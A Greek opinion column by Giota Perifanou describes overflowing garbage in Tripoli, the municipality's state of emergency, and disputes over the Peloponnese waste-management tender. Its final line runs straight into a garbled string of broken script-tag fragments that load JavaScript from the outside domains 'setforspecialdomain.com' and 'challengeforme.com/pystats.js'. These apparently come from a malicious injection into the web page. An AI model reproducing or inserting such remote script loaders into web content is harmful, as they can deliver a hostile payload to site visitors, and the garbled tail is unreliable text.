Όχι άλλα σκουπίδια στην Τρίπολη. Της Γιώτας Περήφανου

Σε κατάσταση έκτακτης ανάγκης η Τρίπολη λόγω των σκουπιδιών

Ετοιμάζοντας τις βαλίτσες μου για την Τρίπολη και ενώ ο νους ταξίδευε ρομαντικά… δεν μπορούσα να φανταστώ τι θα αντίκριζα με το που θα πατούσα το πόδι μου στη μεγαλύτερη πόλη και πρωτεύουσα του Νομού Αρκαδίας. Αλλιώς τα είχα στο μυαλό μου! Είχα φτιάξει και διάθεση!

Γράφει η Γιώτα Περήφανου

Βουνά από σκουπίδια ξεχείλιζαν στις γειτονιές της… και «άρωμα» διαρκείας βαρύ χειμωνιάτικο… Ωραίο καλωσόρισμα για τους επισκέπτες με την ευγενική χορηγία της Περιφέρειας και του Δήμου. Τι να πω…
Παρά τις αντίξοες καιρικές συνθήκες και την απίστευτη μπόχα από άκρη σε άκρη ακόμη και σε κεντρικά σημεία της πόλης ρίσκαρα και έκανα τις πρώτες μου βόλτες – με δική μου φυσικά ευθύνη – ανάμεσα σε τόνους από σακούλες απορριμμάτων. Απορώ πως οι κάτοικοι ακόμη δεν έχουν ξεσηκωθεί… Όπως με ενημέρωσε μια ευγενική κυρία η εικόνα αυτή δεν είναι πρωτόγνωρη για την περιοχή. Πέρυσι το σκουπιδομπάχαλο ήταν χειρότερο!

Κάθε χρόνο και καλύτερα σκέφτηκα και συνέχισα την σκουπιδοβόλτα μου. Από πού να περάσω και που να σταθώ… Παντού σκουπίδια, παντού!!! Ακόμη και εκεί που πάρκαρα… όταν επέστρεψα είδα και έπαθα να ανοίξω την πόρτα του αυτοκινήτου.

Ο Δήμος αν και κηρύχθηκε προσφάτως σε κατάσταση έκτακτης ανάγκης από την Περιφέρεια ακόμη μαζεύει… σακούλες, καθαρίζει γειτονιές και και και… ίδωμεν, η ελπίδα πεθαίνει πάντα τελευταία… Υπολογίστε και εσείς από τις 31 Αυγούστου μέχρι και σήμερα… πόσες μέρες έχουν περάσει και τους τόνους σκουπιδιών που έχουν συσσωρευτεί… Φουλαρισμένοι εδώ και μήνες πράσινοι και μπλε κάδοι (η ανακύκλωση έκανε περίπατο). Ευτυχώς που έπεσε η θερμοκρασία εξαφανίστηκαν και οι μύγες. Σωτήριος ο καιρός!

Για την ιστορία, ρώτησα και έμαθα πως… οι Τοπικές Αρχές δεν έχουν χωροθετήσει περιοχή για την προσωρινή αποθήκευση των απορριμμάτων και προσπαθούν να βρουν περιοχές εκτός Δήμου. Ασυνεννοησία, αδιαφορία… πώς να χαρακτηρίσω αυτή την κατάσταση; Αυτό που γνωρίζω είναι αυτό που βλέπω παρά τις επανειλημμένες διαβεβαιώσεις από Δήμο και Περιφέρεια για ο,τι το καλύτερο για τον πολίτη, πως το πρόβλημα όσο περνάνε οι μέρες γιγαντώνεται και οι χιλιάδες βρώμικες σακούλες πλέουν σαν βαρκούλες στο νερό της βροχής μέχρι και τις πόρτες των ισόγειων σπιτιών και των καταστημάτων.

Κάποιες αχτίδες φωτό διαφάνηκαν πριν από λίγα 24ωρα καθώς ορισμένα πιο πολυσύχναστα σημεία άρχισαν να καθαρίζονται… Ένα πουλάκι μίλησε για συνεργασία Αρχών με ιδιώτη… Από πού θα πληρώνεται αυτός, κάθε πότε θα γίνεται η αποκομιδή και πόσα θα εισπράττει είναι εξίσου πονεμένες ιστορίες. Στο πρόσφατο περιφερειακό συμβούλιο, η παράταξη του Οδυσσέα Βουδούρη τόνισε ότι θα προσφύγει στο Συμβούλιο της Επικρατείας για να ακυρωθεί ο διαγωνισμός για τη διαχείριση των απορριμμάτων στην Πελοπόννησο.
Όπως και να έχει ακόμη παραμένουν τόνοι απορριμμάτων μέσα στη μύτη μας. Τι θα γίνει… ένας Δήμος ξέρει και η Περιφέρεια….

Μέχρι τότε συνεχίζω να παλεύω με τους κάδους και ευελπιστώ οι επόμενες μέρες της διαμονής μου στην Τρίπολη να κρύβουν πέρα από σκουπίδια… και ευχάριστες εκπλήξεις…___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >